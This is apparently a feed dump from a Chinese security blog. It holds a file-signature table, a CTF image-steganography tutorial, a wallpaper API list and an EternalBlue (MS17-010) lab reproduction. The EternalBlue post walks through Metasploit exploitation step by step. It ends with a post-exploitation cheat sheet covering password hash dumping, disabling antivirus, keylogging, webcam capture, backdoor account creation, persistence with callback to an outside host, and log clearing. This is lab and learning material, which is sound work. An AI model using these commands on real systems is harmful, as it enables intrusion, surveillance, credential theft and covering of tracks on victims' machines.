msc3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31 2E 30 22 3F 3E 0D 0A 3C 4D 4D 43 5F 43 6F 6E 73 6F 6C 65 46 69 6C 65 20 43 6F 6E 73 6F 6C 65 56 65 72 73 69 6F 6E 3D 22Microsoft Management Console Snap-in Control file
msi23 20Cerius2 file
MSV4D 53 5F 56 4F 49 43 45Sony Memory Stick Compressed Voice file
NES4E 45 53
NLSC2 20 20
nri0E 4E 65 72 6F 49 53 4FNero CD Compilation
ntf1A 00 00Lotus Notes database template
nsf; ntf1A 00 00 03 00 00Lotus Notes Database/Template
nsf1A 00 00 03 00 00 11 00Notes Database
nsf1A 00 00 04 00 00Lotus Notes database
ntf30 31 4F 52 44 4E 41 4E 43 45 20 53 55 52 56 45 59 20 20 20 20 20 20 20National Transfer Format Map File
obj4C 01Microsoft Common Object File Format (COFF) relocatable object code file for an Intel 386 or later/compatible processors
OCX4D 5AActiveX or OLE Custom Control
OCX4D 5A 90
OLB4D 5AOLE object library
OLB4D 5A 90
org; pfc41 4F 4C 56 4D 31 30 30AOL personal file cabinet (PFC) file
pak1A 0BCompressed archive file
PAT47 46 31 50 41 54 43 48Advanced Gravis Ultrasound patch file
PAT47 50 41 54GIMP (GNU Image Manipulation Program) pattern file
PBK5B 41 44
PCB17 A1 50
PCS0A 05 01
pcx0A nn 01 01ZSOFT Paintbrush file(where nn = 0x02, 0x03, or 0x05)
pcx0A 05 01 08PC Paintbrush(often associated with Quake Engine games)
pdb[11 byte offset] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00Palmpilot Database/Document File
PDF25 50 44
pdf; fdf25 50 44 46Adobe Portable Document Format and Forms Document file
pdf25 50 44 46 2D 31 2EAdobe Acrobat
PDG48 48 02
pf11 00 00 00 53 43 43 41Windows prefetch file
pic01 00 00 00 01Unknown type picture file
PJT00 00 07
PLL24 53 6F
PNG89 50 4E
PNG89 50 4E 47
png89 50 4E 47 0D 0APNG Image File
png89 50 4E 47 0D 0A 1A 0APNG Image File
PPC52 65 63
PPTD0 CF 11
ppt[512 byte offset] 00 6E 1E F0PowerPoint presentation subheader (MS Office)
ppt[512 byte offset] 0F 00 E8 03PowerPoint presentation subheader (MS Office)
PPZ4D 53 43 46Powerpoint Packaged Presentation
prc42 4F 4F 4B 4D 4F 42 49Palmpilot resource file
PRG23 44 45
ps25 21 50 53 2D 41 64 6F 62 65Postscript
PSD38 42 50
psd38 42 50 53Adobe Photoshop image file
psp7E 42 4B 00PaintShop Pro Image File
pst21 42 44 4EMicrosoft Outlook Personal Folder file
pwlE3 82 85 96Windows Password
qbb45 86 00 00 06 00Intuit QuickBooks Backup file
qdfAC 9E BD 8FQuicken
qph03 00 00 00Quicken price history file
qt6D 64 61 74Quicktime Movie File
qxd00 00 49 49 58 50 52Quark Express document (Intel & Motorola, respectively)
qxd00 00 4D 4D 58 50 52
ra2E 52 4D 46 00 00 00 12 00Real Audio file
ra; ram2E 72 61 FDReal Audio File
ra2E 72 61 FD 00RealAudio streaming media file
RAR52 61 72
rar52 61 72 21RAR Archive File
RAW06 05 00
reg52 45 47 45 44 49 54 34
rgb01 DA 01 01 00 03Silicon Graphics RGB Bitmap
RM2E 52 4D
rm; rmvb2E 52 4D 46Real Media streaming media file
rpmED AB EE DBRPM Archive File
RTD43 23 2B 44 A4 43 4D A5 48 64 72RagTime document file
RTF7B 5C 72
rtf7B 5C 72 74 66Rich Text Format File
sav24 46 4C 32 40 28 23 29 20 53 50 53 53 20 44 41 54 41 20 46 49 4C 45SPSS Data file
SBV46 45 44 46(Unknown file type)
SCH2A 76 65
scm80 53 43
SH348 48 47 42 31Harvard Graphics presentation file
SHD4B 49 00 00Windows 9x printer spool file
sit53 49 54 21Stuffit v1 Archive File
sit53 74 75 66 66 49 74Stuffit v5 Archive File
sle3A 56 45 52 53 49 4F 4ESurfplan kite project file
sle41 43 76teganos Security Suite virtual secure drive
sly; srt; slt53 52 01 00Sage sly.or.srt.or.slt
SMD00 FF FF
snm00 1E 84 90 00 00 00 00Netscape Communicator (v4) mail folder
SNP4D 53 43 46Microsoft Access Snapshot Viewer file
sol00 BFAdobe Flash shared object file (e.g., Flash cookies)
spl00 00 01 00Windows NT/2000/XP printer spool file
SCR4D 5AScreen saver
SUBFF FF FF
SWF43 57 53Shockwave Flash file (v5+)
SWF46 57 53Macromedia Shockwave Flash player file
sxccalcOpenOffice Calc
sxddrawOpenOffice Draw
sxiimpressOpenOffice Impress
sxmmathOpenOffice Math
sxwwriterOpenOffice Writer
syw41 4D 59 4FHarvard Graphics symbol graphic
TAG00 00 02
tar; cpio30 37 30 37 30 37CPIO Archive File
tar.z1F 9D 90Compressed tape archive file
tga00 00 10 00 00RLE压缩的前5字节
TGA00 00 02
tga00 00 02 00 00未压缩的前5字节
TIF; TIFF49 20 49Tagged Image File Format file
tif; tiff49 49 2ATIFF (Intel)
tif; tiff49 49 2A 00Tagged Image File Format file (little endian, i.e., LSB first in the byte; Intel)
TIF; TIFF4D 4D 00 2ATagged Image File Format file (big endian, i.e., LSB last in the byte; Motorola)
tif; tiff4D 4D 2ATIFF (Motorola)
TIF; TIFF4D 4D 00 2BBigTIFF files; Tagged Image File Format files >4 GB
TLB4D 53 46 54 02 00 01 00OLE, SPSS, or Visual C++ type library file
tr101 10Novell LANalyzer capture file
TST00 01 00
TTF00 01 00
ufa55 46 41UFA Archive File
VBX4D 5AVisualBASIC application
VCD45 4E 54 52 59 56 43 44 02 00 00 01 02 00 18 58VideoVCD (GNU VCDImager) file
vcf42 45 47 49 4E 3A 56 43 41 52 44 0D 0AvCard file
vob00 00 01 BADVD Video Movie File (video/dvd, video/mpeg)
VXD, 3864D 5AWindows virtual device drivers
WAV52 49 46
wav57 41 56 45Wave
wav57 41 56 45 66 6D 74Wave Files
wb200 00 02 00QuattroPro for Windows Spreadsheet file
wb3[24 byte offset] 3E 00 03 00 FE FF 09 00 06Quatro Pro for Windows 7.0 Notebook file
wk1; wks20 00 60 40 60Lotus 123 v1 Worksheet
wk100 00 02 00 06 04 06 00 08 00 00 00 00 00Lotus 1-2-3 spreadsheet (v1) file
wk300 00 1A 00 00 10 04 00Lotus 123 spreadsheet (v3) file
wk4; wk500 00 1A 00 02 10 04 00Lotus 1-2-3 spreadsheet (v4, v5) file
wks0E 57 4B 53DeskMate Worksheet
WMA30 26 B2
wmf01 00 09 00Graphics Metafile
wmf01 00 09 00 00 03Windows Metadata file (Win 3.x format)
wmf02 00 09 00Graphics Metafile
wmfD7 CD C6 9AWindows Meta File
WMV30 26 B2
wpFF 57 50 43WordPerfect v5 or v6
wpdFF 57 50 43WordPerfect
wpgFF 57 50 47WordPerfect Graphics
wri31 BEMicrosoft Write file
WRI31 BE 00
wri32 BEMicrosoft Write file
ws1D 7DWordStar Version 5.0/6.0 document
XBE58 42 45
xdr3CBizTalk XML-Data Reduced Schema file
xls09 02 06 00 00 00 10 00 B9 04 5C 00MS Excel v2
xls09 04 06 00 00 00 10 00 F6 05 5C 00MS Excel v4
XLSD0 CF 11
xlsD0 CF 11 E0MS Excel
xls[512 byte offset] 09 08 10 00 00 06 05 00Excel spreadsheet subheader (MS Office)
XML3C 3F 78
xml3C 3F 78 6D 6CXML Document
xmlFF FE 3C 00 52 00 4F 00 4F 00 54 00 53 00 54 00 55 00 42 00XML Document (ROOTSTUB)
XMV00 50 01
XSLFF FE 3C
xul72 73 69 6F 6E 3D 22 31 3C 3F 78 6D 6C 20 76 65 2E 30 22 3F 3EXML User Interface Language file
z1F 9DTAR Compressed Archive File
Z1F 9D 8C
ZIP50 4B 03
zip; jar; zipx50 4B 03 04ZIP Archive
zip50 4B 30 30ZIP Archive (outdated)
Zip50 4B 30 30 50 4B 03 04WINZIP Compressed
zoo5A 4F 4F 20ZOO Archive File
]]> CTF隐写术(Steganography)文件隐写的常用方法总结 CTF隐写术(图片隐写) https://blog.anineg.space/2022/06/25/yinxie1/ 2022-06-25T00:22:06.000Z 2022-07-25T13:31:38.363Z 附加式的图片隐写:

字符串方式:

字符串附加在文件的后面是因为,如果图片附加在中间,可能破坏图片的信息;如果附加在图片的头部位置,又破坏了文件头。基于此点,也可以使用16进制编辑器找到这一串字符串。

分离方法:

  • strings分离:

-a --all:扫描整个文件而不是只扫描目标文件初始化和装载段

-f –print-file-name:在显示字符串前先显示文件名

-t --radix={o,d,x}:输出字符的位置,基于八进制,十进制或者十六进制

-e --encoding={s,S,b,l,B,L}:选择字符大小和排列顺序:s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit

分离命令:(cmd)

strings xxx.jpg

img

使用WinHex查看图片源码或查看图片属性。

img

24287763980e488e50bc02d0c124f50

图种方式:

图片后缀:

将图片后缀名改为.zip\rar\7z等压缩格式后打开。

图片拼接:

以cmd命令行copy /b 1.jpg+2.jpg 3.jgp 以二进制方式连接两个图片。

df4032ac69627c834b2d9787cbda5ab

分析方法:

使用binwalk工具分析图片,可以发现从35786块偏移开始有另一张jpg图片。(win下安装binwalk:python setup.py install):

C:\Python27\Scripts>python binwalk 3.jpg

QQ截图20220725084840

分离方法:

  • 一是使用WinHex分离:

jpg格式文件开始的2字节是FF D8,之后2个字节是FF E0 ,最后2个字节是图像文件结束标记为FF D9 。我们打开3.jpg,Alt+A全选图片16进制数值,菜单—搜索—十六进制数值—填入FFD8—取消统计次数—勾选列出搜索结果,定位到第二个FFD8处(或使用Alt+G快捷键定位到35786处),使用Alt+1快捷键选取FF为开始块,Alt+2选取D9为结束块,然后右键—Edit—Copy Block—Into New File保存.jpg后缀的文件。得到隐藏图片:

34921ef294be4074adb6d8f139f2450

  • 二是使用foremost分离:

foremost是一个基于文件文件头和尾部信息以及文件的内建数据结构恢复文件的命令行工具。

分离命令:

foremost xxx.jpg

会自动生成output目录存放分离出文件。

文件拼接:

使用命令 copy /b 1.jpg + 1.zip 2.jpg,利用copy命令将两个文件以二进制方式连接起来。在jpg中结束符是FF D9,图片查看器会忽视jpg结束符之后的内容,所以附加的zip不会影响到图像的正常显示。

分离方法:

  • 一是使用WinHex分离:

50 4B 03 04就是ZIP文件的文件头,一般以PK表示。

d7ccba40dff1ba6fe347504f70188d0

选取以50开头以及到末尾的的数据,右键单击,选择编辑,复制选块到新文件,保存新文件为zip格式命名规则即可。

21482f0d7a82c9f1b67906676e4c20c

  • 二是使用foremost分离:

具体操作同上。

f91fe3f0dde2371b77916171ce9cd04

基于文件结构的图片隐写:

PNG图片结构:

标准的PNG文件结构包括:PNG文件标识和PNG数据块。
PNG图片文件结构:

  • (固定)8字节89 50 4E 47 0D 0A 1A 0A为png文件头;

  • (固定)4字节00 00 00 0D(即十进制的13)代表数据块的长度为13;

  • (固定)4字节49 48 44 52(即为ASCII码的IHDR)是文件头数据块的标识(IDCH);

  • (可变)13位数据块(IHDR)

    • 前四个字节代表该图片的宽

    • 后四个字节代表该图片的高

    • 后五个字节依次为:

      Bit depth、ColorType、Compression method、Filter method、Interlace method

  • (可变)剩余四字节为该png的CRC检验码,由从IDCH到IHDR的十七位字节进行crc计算得到。

    PNG图片文件头数据块(IHDR)包括:宽、高、图像深度、颜色类型、压缩方法等(图中蓝色的部分即IHDR数据块)。

89072cd3f4721309420f26c5c7533bd

修改高度隐写:

先用TweakPNG打开图片,一般修改过长宽的图片都会报错。

949de65f4ff87fbd366de838431daf7

找到PNG图片高度值所对应的位置,并修改为一个较大的值,尝试打开。

9f890ebd638fd22da6d2b7be6882317

bb43ce097549bc9b01e09186dff2251

修改01 00为02 00,并保存后打开。

2288734b6f6c69f29825cbb15cf37f9

修改宽高之后的PNG图片可能打不开,需要修复PNG图片的CRC校验值。

方法:

选中PNG的struct IHDR Ihdr部分(图中蓝色部分),使用CRC Calculator重新计算CRC校验值。

1e285f2630640e2b39434b522daff1a

19bb5406ba211bb5aa4d62695ddeebf

将struct IHDR Ihdr的CRC(图中蓝色部分)修改为重新计算过的CRC。

cf44a728561676addc2df8254671312

再用TweakPNG打开图片不报错,修复成功。

IDAT块的隐写:

PNGCheck可以验证PNG图片的完整性(通过检查内部CRC-32校验和&bra;比特&ket;)和解压缩图像数据,它能够转储几乎所有任选的块级别信息在该图像中的可读数据。

查询命令:

pngcheck -v xxx.png

88317a599a93fe7609d1067d860301f

基于LSB原理的图片隐写:

简单的LSB隐写:

利用LSB(最低有效位 (Least Significant Bit)来进行隐写。例如在PNG图片的储存中,每个颜色会有8bit,LSB隐写就是修改了像数中的最低的1bit,人眼无法区别。例如我们想把A隐藏进来的话,可以把A转成16进制的0x61再转成二进制的01100001,再修改为红色通道的最低位为这些二进制串。

分离方法:

  • Stegsolve分离:

使用Stegsolve—Analyse—Frame Browser,可以浏览三个颜色通道中的每一位。

beb6ede00c628a88f332085e2c88a53

此种隐写的载体一般为png或bmp格式,jpg的有损压缩方式会破坏隐写的内容。

基于DCT域的JPG图片隐写:

背景知识:

JPEG图像格式使用离散余弦变换(Discrete Cosine Transform,DCT)函数来压缩图像,而这个图像压缩方法的核心是:通过识别每个8×8像素块中相邻像素中的重复像素来减少显示图像所需的位数,并使用近似估算法降低其冗余度。因此,我们可以把DCT看作一个用于执行压缩的近似计算方法。

因为丢失了部分数据,所以DCT是一种有损压缩(Loss Compression)技术,但一般不会影响图像的视觉效果。

在这个隐写家族中,常见的隐写方法有JSteg、JPHide、Outguess、F5等等,分离方法为Stegdetect。

Stegdetect简介:

Stegdetect可以检测到通过JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX和Camouflage等这些隐写工具隐藏的信息,并且还具有基于字典暴力破解密码方法提取通过Jphide、outguess和jsteg-shell方式嵌入的隐藏信息。

Stegdetect参数:

  • -q 仅显示可能包含隐藏内容的图像。
  • -n 启用检查JPEG文件头功能,以降低误报率。如果启用,所有带有批注区域的文件将被视为没有被嵌入信息。如果JPEG文件的JFIF标识符中的版本号不是1.1,则禁用OutGuess检测。
  • -s 修改检测算法的敏感度,该值的默认值为1。检测结果的匹配度与检测算法的敏感度成正比,算法敏感度的值越大,检测出的可疑文件包含敏感信息的可能性越大。
  • -d 打印带行号的调试信息。
  • -t 设置要检测哪些隐写工具(默认检测jopi),可设置的选项如下:
    • j 检测图像中的信息是否是用jsteg嵌入的。
    • o 检测图像中的信息是否是用outguess嵌入的。
    • p 检测图像中的信息是否是用jphide嵌入的。
    • i 检测图像中的信息是否是用invisible secrets嵌入的。
  • -V 显示软件版本号。

Stegdetect会在检测结果后面使用1~3颗星来标识隐藏信息存在的可能性大小,3颗星表示隐藏信息存在的可能性最大。

Stegdetect命令(cmd):

stegdetect.exe -tjopi -s 100.0 xxx.jpg

JPHS提取:

使用Stegdetect探测jpg隐藏种类。

797a9f47e0df8be20bc3afbbaa2af9c

使用JPHS打开图片,点击Seek功能,会弹出一个密码的输入框,这里默认为空口令,点击OK,将提取出来的信息保存为flag.txt。

24de8d824f7babbfbe3af26f1480d30

Outguess提取:

使用Stegdetect探测jpg隐藏种类。

8e07335b18d8141a78d98a3daf658f3

点击Enter key功能,输入密码,这里我隐写的时候,使用的密码是123456

点击Load image 加载目标图片

点击Extract file功能,将提取出来的信息保存成flag.txt文件。

3c22b301752d18da5b49d16e6c7e3b3

数字水印的隐写:

背景知识:

数字水印:

数字水印(digital watermark)技术,是指在数字化的数据内容中嵌入不明显的记号。

特征是,被嵌入的记号通常是不可见或不可察的,但是可以通过计算操作检测或者提取。

盲水印与傅里叶变换:

盲水印,是指人感知不到的水印,包括看不到或听不见(没错,数字盲水印也能够用于音频)。其主要应用于音像作品、数字图书等,目的是,在不破坏原始作品的情况下,实现版权的防护与追踪。

对图像进行傅里叶变换,起始是一个二维离散傅里叶变换,图像的频率是指图像灰度变换的强烈程度,将二维图像由空间域变为频域后,图像上的每个点的值都变成了复数,也就是所谓的复频域,通过复数的实部和虚部,可以计算出幅值和相位,计算幅值即对复数取模值,将取模值后的矩阵显示出来,即为其频谱图。但是问题来了,复数取模后,数字有可能变的很大,远大于255,如果数据超过255,则在显示图像的时候会都当做255来处理,图像就成了全白色。因此,一般会对模值再取对数,在在0~255的范围内进行归一化,这样才能够准确的反映到图像上,发现数据之间的差别,区分高频和低频分量,这也是进行傅里叶变换的意义。

2. 频域盲水印隐写:

分离方法:

  • Blind-watermark(python 2.7):

分离水印命令:

python decode.py --original <original image file> --image <image file> --result <result file>

添加水印命令:

python encode.py --image <image file> --watermark <watermark file> --result <result file>

4a35bce354a1b54e2def8672c497efc

图片容差隐写:

背景知识:

容差,在选取颜色时所设置的选取范围,容差越大,选取的范围也越大,其数值是在0-255之间。

容差比较的隐写:

分离方法:

beyond compare分离:

操作步骤:

打开工具,选择图片比较,导入example_1.jpg和example_2.jpg。

15cdf2bf138ae65a0416733d2bc2ed1

选择容差模式,并调整容差大小

a48145f9f1a24a8ddf98c92c2082b59

二维码隐写:

QR Research解码:

使用QR Research读取二维码中的信息。

e10d4e28da69762f1350da850be6e46

python脚本生成二维码:

使用python脚本,10组合的将字符串解码成flag.png。

268f9fbc4e20e973c0c2e594c4d04a5

]]> CTF隐写术(Steganography) 图片隐写常用方法总结 《拒绝校园贷》——大学生心理微电影 https://blog.anineg.space/2022/05/01/weidianying/ 2022-05-01T13:29:58.000Z 2022-08-07T02:22:30.581Z

Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。

]]> <div class="tip "><p>Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。</p> </div> <div align="center" class="aspect-ratio"> <iframe src="https://player.bilib 永恒之蓝漏洞复现 https://blog.anineg.space/2022/04/21/eternalblue/ 2022-04-21T10:56:47.000Z 2024-05-06T09:33:28.470Z 漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Linux Kali (192.168.8.242)

靶机:Windows7 x64 (192.168.8.172)

复现过程:

主机发现

用nmap探测本网段存活主机 nmap 192.168.8.17

探测到存活主机ip,并探测到开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

进入MSF框架

执行msfconsole

2

ms17-010代码 msf6 > search ms17_010

3

在这里可以看到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,前者扫描漏洞,后者进行攻击。

使用ms17-010扫描模块

msf6 > use auxiliary/scanner/smb/smb_ms17_010

查看模块需要配置的参数 show options

4

在Required一栏中显示yes的需要填写Current Setting项

set rhosts 192.168.8.172

执行扫描 run

5

显示可能存有永恒之蓝漏洞。

使用ms17-010攻击模块

msf6 > use exploit/windows/smb/ms17_010_eternalblue

查看模块需要配置的参数 show options

6

同理,设置目标IP :set rhosts 192.168.8.172

设置用于接收从目标机弹回来的shell:set LHOST 192.168.1.11

执行攻击 run

7

攻击成功!

后渗透阶段

使用shell可以进入被攻击机的Windows shell,但会有乱码。使用chcp 65001,改变代码页(65001为UTF-8的代码页)即恢复正常。

8

使用screenshot进行截屏

9

想从目标主机shell退出到 meterpreter ,输入:exit

要想从 meterpreter 退出到MSF框架,输入:background

更多操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
run hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run             #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反弹时间间隔是5s 会自动连接
                                   192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev                       #清除日志
1
2
3
4
5
6
7
8
9
run post/windows/manage/migrate                  #自动进程迁移     
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上     
run post/windows/manage/killav                   #关闭杀毒软件     
run post/windows/manage/enable_rdp               #开启远程桌面服务     
run post/windows/manage/autoroute                #查看路由信息     
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户     
run post/windows/gather/enum_applications        #列举应用程序     
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码     
run windows/gather/smart_hashdump                #dump出所有用户的hash
]]> 记录一次漏洞复现,17年的WannaCry就是利用Windows操作系统445端口存在的漏洞进行传播 文件上传漏洞 https://blog.anineg.space/2022/03/25/upload/ 2022-03-25T10:20:40.000Z 2022-04-26T12:33:51.944Z 什么是文件上传漏洞

文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。

前端JS过滤绕过

文件名过滤绕过

Content-Type过滤绕过

文件头过滤绕过

.htaccess文件上传

文件截断上传

竞争条件文件上传

]]> 文件上传漏洞:如果服务器的处理逻辑做的不够安全,会导致严重的后果。 随机背景API接口整理 https://blog.anineg.space/2022/03/20/backgroundAPI/ 2022-03-20T03:18:17.000Z 2022-11-21T09:15:29.944Z 废话不多说,上图!(每次刷新都不一样哦~)

(API链接在后面)

API接口链接

必应壁纸

1
2
3
4
https://api.dujin.org/bing/1366.php (1366*768)
https://api.dujin.org/bing/1920.php (1920*1080)
https://api.dujin.org/bing/m.php    (1080*1920)
//api.timecdn.cn/libs/wallpaper/v1  (1920*1080)

今日必应壁纸

野生动漫 API

1
2
https://api.mtyqx.cn/api/random.php
https://api.mtyqx.cn/tapi/random.php

系列 API(需自己按照网站说明调用 API 参数)

小歪 API

https://api.ixiaowai.cn

未知名称动漫 API

https://acg.toubiec.cn

樱花 API

http://www.dmoe.cc/

岁月小筑随机背景 API

https://img.xjh.me

保罗 API

https://api.paugram.com/help/wallpaper/

樱道随机图片

https://img.r10086.com/

墨天逸

http://api.mtyqx.cn

Unsplash

https://source.unsplash.com/

后宫漫图:

https://acg.sx/images

EEEDOG

https://www.eee.dog/tech/rand-pic-api.html

东方 Project

https://img.paulzzh.tech/

搏天 API

https://api.btstu.cn/doc/sjbz.php

汐岑 ACG

https://acg.yanwz.cn

凌一 API

https://api.lyiqk.cn

Lorem Picsum

https://picsum.photos/

API 接口文档 - 夏沫博客

https://cdn.seovx.com/

Ushio API

https://www.eee.dog/tech/rand-pic-api.html

点滴 API

https://api.ddkjt.com/

Langford’s API

https://api.ucany.net/

一铭 API

https://api.wer.plus/product/doc?id=2

https://api.wer.plus/product/doc?id=3

R0A1NG’s API
https://api.roaing.com/#/doc/dongmanimg

JacksonXE の API
https://api.jacksonxe.cn/api/file/random?sole=

随机壁纸API整理

https://quest.myxxts.club/archives/54/

]]> 整理了一些可以用的随机壁纸API接口